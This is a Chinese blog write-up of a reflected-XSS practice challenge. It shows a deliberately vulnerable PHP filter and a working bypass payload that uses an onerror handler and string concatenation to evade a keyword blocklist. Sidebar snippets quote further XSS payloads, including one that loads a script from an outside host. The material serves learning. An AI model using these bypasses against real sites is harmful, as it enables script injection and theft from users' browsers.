安全-反射性xss基础注入

已于 2023-01-05 12:32:07 修改
阅读量351 收藏 1
点赞数
分类专栏: 安全 文章标签: 安全 xss 前端
于 2022-11-08 21:09:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63069714/article/details/127757363
版权

目录

题目

代码分析

注入过程思路

题目

注:此题与上一次的题目相似,因此直接注入结果。

<?php
header('X-XSS-Protection: 0');
$xss = isset($_GET['xss'])?$_GET['xss']:'';
$xss = str_replace(array("(",")","&","\\","<",">","'"), '', $xss);
if (preg_match('/(script|document|cookie|eval|setTimeout|alert)/', $xss)) {
    exit('bad');
}
echo "<img src=\"{$xss}\">";
?>

代码分析

1、下面代码是运用了三目运算符对get是否传到参数进行了判断,并将传到的参数对xss变量进行赋值。

$xss = isset($_GET['xss'])?$_GET['xss']:'';

2、下面代码是通过正则表达式,将get上传的参数进行了过滤,将" ( ", " ) ", " & ", " \\ ", " < ", " > ", " ' "这些符号进行了替换,替换结果为空。

$xss = str_replace(array("(",")","&","\\","<",">","'"), '', $xss);

3、条件语句,将(script|document|cookie|eval|setTimeout|alert)这些关键字作为条件语句的条件,只要出现这些关键字的任何一个,就会执行程序退出。

if (preg_match('/(script|document|cookie|eval|setTimeout|alert)/', $xss)) {
    exit('bad');

4、通过get传参,进行打印<img>标签注入的结果。

echo "<img src=\"{$xss}\">";

注入过程思路

 

注入语句:

?xss=1%22%20onerror=location=%22javascri%22%2b%22pt:al%22%2b%22ert%25281%2529

思路:

题目中明确说明不能出现以下关键字(script|document|cookie|eval|setTimeout|alert),因此思路就是就将这些字符串进行拼接,在javascript中拼接字符串可以直接使用+,但是在url地址栏中,+会被url转义为空格,因此需要将+进行urlcode编码。其他原因与上次的题目相同。因此弹窗成功弹出。

努力学IT的小徐
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
Python-XSSFinder用于检测网站中反射的xss工具集
08-10
总之,XSSFinder是Python开发者和安全研究员的有力武器,它简化了反射型XSS漏洞的检测过程,帮助确保网站的安全性。了解并熟练使用这样的工具,对于提高网站安全性、防止恶意攻击至关重要。在日常开发和维护过程中,...
xss跨站脚本***大全
weixin_34331102的博客
03-20 447
(1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无...
WEB 安全,浅谈 XSS 攻击(附简单实例)
DisMisPres的博客
12-29 2466
为什么说一些网站上的弹出广告(一刀999)不要去点,特别是已经登录过的网站,个人信息的泄露等都很有可能是从这里泄露的。由于XSS这种攻击手法是很常见且基础的方式,目前大多数的web框架都对其做过适配了,我们也不需要太过担心这种安全问题,但是还是要知道有这么回事,并能够有相应的处理方案。现在大多数的项目都是前后端分离的,前后端都要对XSS有所了解,在实际开发中需要多考虑下这类安全问题。
XSS注入(跨站脚本攻击)原理与实践
最新发布
打工人的自我修养
04-26 1294
XSS注入是一种最普遍的网站应用程式的安全漏洞攻击,允许恶意使用者将程式码注入到网页上,其他使用者在观看网页时就会受到影响。这类攻击通常包含了HTML以及使用者端脚本语言。
XSS注入
qq_43036356的博客
05-31 516
XSS跨站脚本(Cross-Site Scripting,XSS)自1996年诞生以来,如今已经历十多年的演化。由于和另一种网页技术-层叠样式表(Cascading Style Sheets,CSS)的缩写一样,为了防止混淆,故把原本的CSS简称为XSS
详解XSS漏洞及反射型XSS漏洞
MachineGunJoe666
09-16 369
跨站脚本攻击(Cross-Site Scripting,简称XSS)是一种常见的Web安全漏洞,攻击者通过注入恶意脚本代码,将其注入到Web页面中,并在访问该页面的用户浏览器中执行该脚本代码,从而窃取用户敏感信息、篡改页面内容、操纵页面行为等。XSS漏洞一般分为反射型XSS、存储型XSS和DOM-Based XSS三种类型。反射型XSS漏洞是Web应用程序中常见的安全漏洞,攻击者可利用该漏洞注入恶意代码,窃取用户敏感信息、篡改页面内容、操纵页面行为等。
【应用安全xss二】xss攻击介绍和防范(前端
qq_35789269的博客
04-07 3366
本文我们会讲解 XSS ,主要包括: XSS 攻击的介绍 XSS 攻击的分类 XSS 攻击的预防和检测 XSS 攻击的总结 XSS 攻击案例 XSS 攻击的介绍 在开始本文之前,我们先提出一个问题,请判断以下两个说法是否正确: XSS 防范是后端 RD(研发人员)的责任,后端 RD 应该在所有用户提交数据的接口,对敏感字符进行转义,才能进行下一步操作。 所有要插入到页面上的数据,都要通过一个敏感字符过滤函数的转义,过滤掉通用的敏感字符后,就可以插入到页面中。 如果你还不能确定答案,那么可以带
Web应用安全:反射型XSS.pptx
06-18
反射性xss一般指攻击者通过特定的方式来诱惑受害者去访问一个包含恶意代码的URL。当受害者点击恶意链接url的时候,恶意代码会直接在受害者的主机上的浏览器执行。 反射性XSS又可以叫做非持久性XSS。那是因为这种攻击...
Web-安全渗透全套教程XSS跨.zip
05-22
XSS(Cross-Site Scripting,跨站脚本攻击)是其中一种常见的安全漏洞,它允许攻击者通过在网页上注入恶意脚本,进而对用户浏览器进行操控。本套教程聚焦于XSS攻击的原理、检测和防御策略,旨在帮助学习者深入理解这...
WEB渗透学习-XSS-labs靶场
04-20
1. **反射型XSS(Non-Persistent XSS)**:这是最常见的一种XSS,攻击者的恶意脚本通过用户点击链接或者提交表单时的参数传递到服务器,再反射回用户的浏览器。在XSS-labs中,你可以通过构造特殊URL来触发这类XSS。 ...
XSS注入——反射性XSS
wwwwyyyrre的博客
06-15 2335
所以就可以利用这个函数来构造payload,也是最简单的xss脚本语言:这样就可以绕过了 没有任何的限制 就是一个简单的反射型xss注入等明天搭一个本地的靶场来做xss-labs我认为不是很难,反射型xss
无处不在的安全漏洞-XSS(1) 攻击方式和危害及实例讲解
AAAAAAAAAAAA66的博客
12-08 4256
接触xss和sql很久了,当初看了一遍原理,随便练一个dvwa就觉得自行了,实际上自己离熟练掌握还有很长的距离,这篇帖子会一直更,介绍完原理后会放些相关知识点,CTF题目或者是些实操(仅作学习用)----- 会一(要)直(收)更(藏)的(哦) XSS介绍 XSS又叫CSS(Cross Site Scripting),中文名叫跨站脚本攻击,在Owasp top 漏洞排名中,常年位居前列。是一种在Web应用中常见的安全漏洞,它允许将恶意代码植入Web页面,当其他用户访问此页面时,植入的恶意代码就会.
实现简单的xss
tlucky的博客
04-12 1044
1.简介 XSS(跨站脚本攻击)又叫CSS (Cross Site Script) ,为了区别层叠样式表(CSS)所以叫XSS,XSS的重点不在于跨站点,而是在于脚本的执行。XSS是一种经常出现在 Web 应用程序中的计算机安全漏洞,是由于 Web 应用程序对用户的输入过滤不足而产生的,它指的是攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意的特殊目的。 2.利用xss 一、窃取用户的cookie,登陆用户账号 二、进行社工钓鱼,如弹出来
【Web安全入门】三个技巧教你玩转XSS漏洞
m0_71745754的博客
04-07 243
XSS漏洞是Web应用程序中最常见的漏洞之一,想要入门Web安全的小伙伴,这个知识点是必学的。i春秋官网中有很多关于XSS漏洞的课程,新手小白可以去官网看课学习。学习地址:https://www.ichunqiu.com/search/XSS漏洞XSS是一种经常出现在Web应用中的计算机安全漏洞,也是客户端脚本安全的头号大敌。今天i春秋跟大家分享的是XSS漏洞的进阶篇,如何利用XSS漏洞的一些小技巧,希望对大家学习Web安全有所帮助。简单的说,XSS漏洞的本质就是输入与输出。
04. XSS漏洞原理
weixin_43909650的博客
12-16 1040
2022网安冬令营(web安全/渗透测试/实战训练)——蚁景网安 https://ke.qq.com/course/5874132#term_id=106089914
网络安全-靶机dvwa之XSS注入Low到High详解(含代码分析)
关注网络安全、云原生安全
10-18 8508
本篇文章,针对靶机dvwa(Damn Vulnerable Web Application)中的XSS(DOM)、XSS(Reflected)、XSS(Stored)的LOW、MIDIUM、HIGH安全级别使用网络安全-js安全知识点与XSS常用payloads中提到的XSS注入payloads,使用手工进行XSS注入。并根据网络安全-php安全知识点对LOW、MIDIUM、HIGH、IMPOSSIBLE安全级别的代码进行解释。 目标:弹出窗口/获得cookie XSS(DOM)-LOW 正常 可
XSS注入的原理与实现
LJH1999ZN的博客
02-17 4415
一、JavaScript的常用脚本 1.window.location.href 用来跳转页面 eg:<script>window.location.href='www.jd.com'</script> 2.document.cookie 获取客户端的cookie值 3.script 可以通过“src”属性引入JavaScript文件 二、什么是同源策略 同源策略在web应用的安全模型中是一个重要概念。在这个策略下,web浏览器允许第一个页面的脚本访问第...
反射性xss攻击实例
05-25
反射型XSS攻击是指攻击者将恶意脚本注入到URL中,当受害者点击带有恶意脚本的URL时,该恶意脚本就会在受害者浏览器中执行,从而达到攻击目的。下面是一个反射型XSS攻击的实例。 假设有一个搜索功能,用户在搜索框中输入关键字,然后点击搜索按钮进行搜索。后台处理程序将搜索的关键字拼接成URL,然后返回给前端页面,并在页面中显示搜索结果。 攻击者可以通过构造恶意的搜索关键字,在搜索结果页面中注入恶意脚本。例如,攻击者在搜索框中输入以下内容: ``` <script>alert('XSS Attack!');</script> ``` 当用户点击搜索按钮,后台程序将搜索的关键字拼接成URL,返回给前端页面,并在页面中显示搜索结果。由于URL中包含恶意脚本,因此在页面中显示搜索结果时,恶意脚本就会在用户的浏览器中执行,弹出一个警告框,提示用户遭受了XSS攻击。 这就是一个简单的反射型XSS攻击的实例。攻击者可以通过构造不同的恶意脚本,来实现不同的攻击目的,如窃取用户的敏感信息、盗取用户的cookie等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

努力学IT的小徐

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值